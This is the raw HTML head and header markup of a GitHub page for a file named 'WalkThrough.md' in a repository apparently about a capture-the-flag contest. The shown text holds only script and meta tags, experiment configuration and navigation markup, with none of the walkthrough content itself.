data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Bs1K/vyZ2bHvgl7D760X4B4rTd1A8ZhqnIzBYtMmXdF7vZ8VmWUo5Xo1jbbTRTTigQeLFs7E9Fa6naPM7tGsyQ==" type="application/javascript" src="https://github.githubassets.com/assets/diffs-06cd4afe.js"></script>
<meta name="viewport" content="width=device-width"> <title>DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF · GitHub</title> <meta name="description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/5d2723a0366d21d3798d3536f6978176bd5bddeea9974431e3c884a0bb8e0ca0/deepakdhayal/DeconstruCTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF" /><meta name="twitter:description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/5d2723a0366d21d3798d3536f6978176bd5bddeea9974431e3c884a0bb8e0ca0/deepakdhayal/DeconstruCTF" /><meta property="og:image:alt" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF" /><meta property="og:url" content="https://github.com/deepakdhayal/DeconstruCTF" /><meta property="og:description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="B243:11CA6:FCA87B:1102AE3:61830689" data-pjax-transient="true"/><meta name="html-safe-nonce" content="1794489a7b1ee687ee8126b581f88ea1b011e0016d88b7dc63132ad513c6b179" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCMjQzOjExQ0E2OkZDQTg3QjoxMTAyQUUzOjYxODMwNjg5IiwidmlzaXRvcl9pZCI6IjQwNDc5Mjk0MDMwNjQzODcyMDkiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="3d02b39bafe467cf73a8bbec401be8b5508d9322819015c0bd5e05f13a93d94f" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:412702904" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-pjax-transient="true" />
<meta name="optimizely-datafile" content="{"version": "4", "rollouts": [], "typedAudiences": [], "anonymizeIP": true, "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [{"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20438636352", "key": "control"}, {"variables": [], "id": "20484957397", "key": "treatment"}], "id": "20479227424", "key": "growth_ghec_onboarding_experience", "layerId": "20467848595", "trafficAllocation": [{"entityId": "20484957397", "endOfRange": 1000}, {"entityId": "20484957397", "endOfRange": 3000}, {"entityId": "20484957397", "endOfRange": 5000}, {"entityId": "20484957397", "endOfRange": 6000}, {"entityId": "20484957397", "endOfRange": 8000}, {"entityId": "20484957397", "endOfRange": 10000}], "forcedVariations": {"85e2238ce2b9074907d7a3d91d6feeae": "control"}}, {"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20619540113", "key": "control"}, {"variables": [], "id": "20598530123", "key": "treatment"}], "id": "20619150105", "key": "dynamic_seats", "layerId": "20615170077", "trafficAllocation": [{"entityId": "20598530123", "endOfRange": 5000}, {"entityId": "20619540113", "endOfRange": 10000}], "forcedVariations": {}}, {"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20667381018", "key": "control"}, {"variables": [], "id": "20680930759", "key": "treatment"}], "id": "20652570897", "key": "project_genesis", "layerId": "20672300363", "trafficAllocation": [{"entityId": "20667381018", "endOfRange": 5000}, {"entityId": "20667381018", "endOfRange": 10000}], "forcedVariations": {"83356e17066d336d1803024138ecb683": "treatment", "18e31c8a9b2271332466133162a4aa0d": "treatment", "10f8ab3fbc5ebe989a36a05f79d48f32": "treatment", "1686089f6d540cd2deeaec60ee43ecf7": "treatment"}}], "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "groups": [], "sdkKey": "WTc6awnGuYDdG98CYRban", "environmentKey": "production", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event.do_not_use_in_production"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": ["20479227424", "20619150105"], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": [], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": "click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, {"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": ["20479227424"], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": ["20479227424"], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": ["20479227424"], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": ["20479227424"], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": ["20479227424"], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": ["20479227424"], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": ["20652570897"], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": ["20479227424"], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": ["20619150105"], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": ["20619150105"], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": ["20619150105"], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": ["20479227424"], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": ["20479227424"], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": ["20652570897"], "id": "20795281201", "key": "click.archive_list"}], "revision": "968"}" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-NZtGC6blJ7XNT65diVllJBaNYNfq1AF6KQL75eFqN/RlMMwleYJ/a6KTgp7dEeO3Iy3PGM2h52TpyYawjCYqkg==" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-359b460b.js"></script>
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/deepakdhayal/DeconstruCTF git https://github.com/deepakdhayal/DeconstruCTF.git">
<meta name="octolytics-dimension-user_id" content="48149717" /><meta name="octolytics-dimension-user_login" content="deepakdhayal" /><meta name="octolytics-dimension-repository_id" content="412702904" /><meta name="octolytics-dimension-repository_nwo" content="deepakdhayal/DeconstruCTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="412702904" /><meta name="octolytics-dimension-repository_network_root_nwo" content="deepakdhayal/DeconstruCTF" />
<link rel="canonical" href="https://github.com/deepakdhayal/DeconstruCTF/blob/Master/WalkThrough.md" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
